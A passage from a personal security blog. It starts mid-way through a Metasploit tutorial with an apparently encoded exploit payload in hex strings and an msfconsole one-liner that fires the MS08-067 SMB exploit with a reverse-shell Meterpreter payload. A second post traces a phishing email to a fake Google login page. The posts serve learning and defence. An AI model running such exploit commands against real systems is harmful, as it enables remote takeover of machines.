"\x56\x30\x65\x38\x69\x7a\x66\x6f\x79\x4f\x69\x70\x39\x6f" +
"\x39\x45\x6e\x77\x52\x48\x67\x72\x67\x70\x44\x51\x43\x6c" +
"\x4e\x69\x6b\x56\x63\x5a\x54\x50\x32\x76\x71\x47\x31\x78" +
"\x4f\x32\x49\x4b\x37\x47\x32\x47\x69\x6f\x78\x55\x36\x37" +
"\x71\x78\x4d\x67\x5a\x49\x46\x58\x4b\x4f\x4b\x4f\x6a\x75" +
"\x50\x57\x45\x38\x74\x34\x7a\x4c\x65\x6b\x59\x71\x6b\x4f" +
"\x68\x55\x52\x77\x4a\x37\x63\x58\x43\x45\x62\x4e\x32\x6d" +
"\x31\x71\x79\x6f\x79\x45\x30\x68\x71\x73\x62\x4d\x62\x44" +
"\x43\x30\x6e\x69\x59\x73\x52\x77\x66\x37\x30\x57\x66\x51" +
"\x4b\x46\x63\x5a\x62\x32\x63\x69\x70\x56\x6b\x52\x39\x6d" +
"\x63\x56\x6f\x37\x73\x74\x55\x74\x77\x4c\x57\x71\x56\x61" +
"\x4c\x4d\x53\x74\x44\x64\x62\x30\x6a\x66\x37\x70\x51\x54" +
"\x42\x74\x52\x70\x61\x46\x66\x36\x70\x56\x71\x56\x43\x66" +
"\x32\x6e\x63\x66\x70\x56\x31\x43\x72\x76\x33\x58\x31\x69" +
"\x68\x4c\x75\x6f\x4c\x46\x69\x6f\x4e\x35\x4f\x79\x39\x70" +
"\x52\x6e\x70\x56\x77\x36\x6b\x4f\x30\x30\x61\x78\x53\x38" +
"\x4b\x37\x57\x6d\x33\x50\x39\x6f\x38\x55\x4f\x4b\x68\x70" +
"\x6d\x65\x6d\x72\x51\x46\x50\x68\x59\x36\x6e\x75\x4f\x4d" +
"\x6f\x6d\x6b\x4f\x38\x55\x67\x4c\x47\x76\x73\x4c\x46\x6a" +
"\x4d\x50\x6b\x4b\x49\x70\x74\x35\x34\x45\x4d\x6b\x57\x37" +
"\x76\x73\x74\x32\x32\x4f\x33\x5a\x55\x50\x36\x33\x79\x6f" +
"\x6a\x75\x41\x41"

Scripting

Metasploit framework supports the users write scripts to control the process. There are three ways to read a script:

  1. > msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST [IP]; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST [IP]; run"  
    
  2. > msfconsole -r my_script.rc
    
  3. (in msfconsole)

    msf > resource my_script.rc
    

Database

When conducting a penetration test, it is frequently a challenge to keep track o feverything you have done to the target network. This is where having a database configured can be a great timesaver. Metasploit has build-in support for the PostreSQL database system. (Reference)

Here are some helpful commands:

  • help database
  • hosts
  • services
  • db_nmap: same as nmap but results will be saved in to current database
  • db_import
  • db_export -f xml [filepath for xml]

Conclusion

Metasploit is a powerful tool that allows people can raise attacks with the aid of its exploit database. Although this post only contains the basic usages of Metasploit with one example which is hardly to describe its strength, I will keep update this post if I found anything new and worth sharing.

Friday, February 12, 2016

Fishing Email

I got an email today which looks like a spam mail. However, Google didn't mark it as a spam, which they usually do. So, I took a small note on understand this email.

Email

Instead of using super attractive words, the content was saying that I have to logged in somewhere in order to get my mails back. However, I checked the sender's domain, "hawaiiantel.net", and I am sure that I've never used any service from them. To talk more regarding to this, sometimes, we can't even fully trust that people won't send out spams from domains "look safe". That is, even if the domain is sent from someone we know, we still have to be careful.



External Link

Don't click on the link if we don't trust it at this point. Copy the link and read it in order to understand who's hosting the link. What I got is "http://ow.ly/YeNWT", which looks like a shorten URL hiding the real URL. Normal people rarely do this since there's no benefit in this case, also, it's always better to use URLs with the company's domain so that people can trust.



So, instead of using my original browser, which contains all my cookies of different websites. I used "Tor Browser" to keep myself safe.

Analysis The Site - Routing


After seeing the page on Tor Browser. It's almost 100% sure that this is a fishing site. However, in order to understand it more. We can track how its URL routing works using following information:

> wget http://ow.ly/YeNWT
--2016-02-12 14:17:58--  http://ow.ly/YeNWT
Resolving ow.ly (ow.ly)... 54.67.120.65, 54.183.130.144, 54.183.131.91, ...
Connecting to ow.ly (ow.ly)|54.67.120.65|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://hannahreade.co.uk/WT/orin.htm [following]
--2016-02-12 14:17:59--  http://hannahreade.co.uk/WT/orin.htm
Resolving hannahreade.co.uk (hannahreade.co.uk)... 50.115.112.7
Connecting to hannahreade.co.uk (hannahreade.co.uk)|50.115.112.7|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 102999 (101K) [text/html]
By requesting "http://ow.ly/YeNWT", I was redirected to "http://hannahreade.co.uk/WT/orin.htm". "hannahreade.co.uk" looks like a normal website, and if so, the site may be hacked.

Analysis The Site - Purpose

Like most fishing websites, the purpose of the sites is trying to get the user's accounts with passwords by faking the site. The site looks totally the same as Google login page; however nothing is actually the same besides its layout. We can learn this simply by reading the URL, or by typing wrong passwords and see what will happen.

In this case, I can login without typing a correct password. And, their second page is requesting my cell phone number. Of course, I can go onto next page by giving a reason cell number (even with a wrong phone number format). Then, the site gave me a blank page after I giving all these informations, which is the way the do usually. Therefore, the user may just got confused and ignored this without thinking too much, while the account username and password was sent to the attacker.



Analysis The Site - Code

It's pretty much so far; however, it is still nice if I can go through their code a little bit. After I did "wget" their fishing site. I got the raw file of its site. And, this is its second line:

<meta http-equiv="Refresh" content="1; url=data:text/html;base64, 77u/IA0KPC...

The site is redirected to another URL, "data:text/html;base64, ....", which isn't a hyperlink to another site but a site that contains itself in the URL as a raw string. And, by opening the URL in browser, the raw string will be parsed back to HTML format.

However, part of the code was an encoded JS code which hides the further information.



To find out the attacker, we can simply decode everything on the site, or we can monitoring the package transits between any external services and my laptop. However, I am not going into this now, and may continue this work another day.

Sum Up

Spam doesn't harm if you understand what's going on. In the case here, we can learn that we should:
  • check the sender's domain
  • open suspicious URL in Tor Browser
  • be ware of the URL
  • mark spams on your Gmail if you found one, which makes Google stop it spreading to other people